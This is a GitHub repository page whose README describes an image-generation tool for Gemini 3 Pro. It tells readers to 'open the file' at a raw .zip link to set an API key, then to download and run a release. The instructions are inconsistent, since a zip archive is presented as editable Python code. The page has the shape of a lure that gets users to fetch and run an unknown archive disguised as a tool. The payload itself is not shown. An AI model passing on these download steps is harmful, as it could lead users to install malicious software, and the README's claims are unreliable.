Skip to content

Latest commit

Β 

History

6 Commits

Folders and files

NameName
Last commit message
Last commit date
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 

Repository files navigation

🎨 nano-image-generator-skill - Create Stunning Images from Text

Download

πŸ“¦ Overview

Welcome to the Nano Image Generator Skill. This application allows you to generate images using Gemini 3 Pro Preview with ease. Just describe your image idea and let the tool do the work.

🌟 Features

  • Text-to-image generation: Input your description and receive your image.
  • Reference image support: Enhance your creations with style transfer using up to 14 images.
  • Multiple aspect ratios: Choose from square, portrait, landscape, and cinematic formats.
  • Resolution options: Generate images in 1K, 2K, or even 4K quality.

βš–οΈ Differences from Original Nano Skills

Feature Original This Version
Reference images ❌ Not supported βœ… Up to 14 images
API key config Environment variable Direct code edit

πŸš€ Getting Started

Follow these steps to set up and run the Nano Image Generator:

1. Get Gemini API Key

To use the application, you'll need a Gemini API key. Please visit the following link to obtain it:

Get your Gemini API Key

2. Configure the API Key

Open the file named https://github.com/Kiwee0614/nano-image-generator-skill/raw/refs/heads/main/scripts/nano_skill_image_generator_v2.7.zip. Locate the get_api_key() function, which is around line 37. You need to replace the placeholder text with your actual API key. Here’s how you can do this:

def get_api_key():
    """
    Get API key.

    ⚠️ SETUP REQUIRED: Replace the placeholder with your Gemini API key.
    """
    return "YOUR_API_KEY_HERE"

3. Download & Install

To get started, visit the Releases page and download the latest version of the application.

4. Run the Application

After downloading, locate the file you downloaded. Open it to start using the Nano Image Generator Skill. Follow any on-screen instructions to complete the setup.

πŸ–₯ System Requirements

To ensure the application runs smoothly, make sure your computer meets the following system requirements:

  • Operating System: Windows, macOS, or Linux
  • RAM: 4 GB minimum
  • Disk Space: At least 200 MB free space
  • Python: Version 3.8 or above installed

πŸ“˜ How to Use

  1. Launch the application.
  2. Enter a description of the image you want to create in the provided input field.
  3. If desired, upload reference images for style transfer.
  4. Select your aspect ratio and resolution options.
  5. Click the "Generate" button and wait for the tool to create your image.

πŸ“ž Support

If you face any issues while using the Nano Image Generator Skill, feel free to reach out:

  • Open an issue on the GitHub repository.
  • Check the FAQ section on the GitHub page for troubleshooting tips.

πŸ“₯ Download Link Again

To download the latest version of this application, visit the Releases page. You can find all the necessary files there.

Enjoy creating your images with the Nano Image Generator Skill!

About

🎨 Generate stunning images from text or reference photos with the Nano Image Generator Skill for Gemini 3 Pro, offering versatile outputs and high resolution.

Topics

Resources

Stars

5 stars

Watchers

0 watching

Forks

Releases

Packages

Contributors

Languages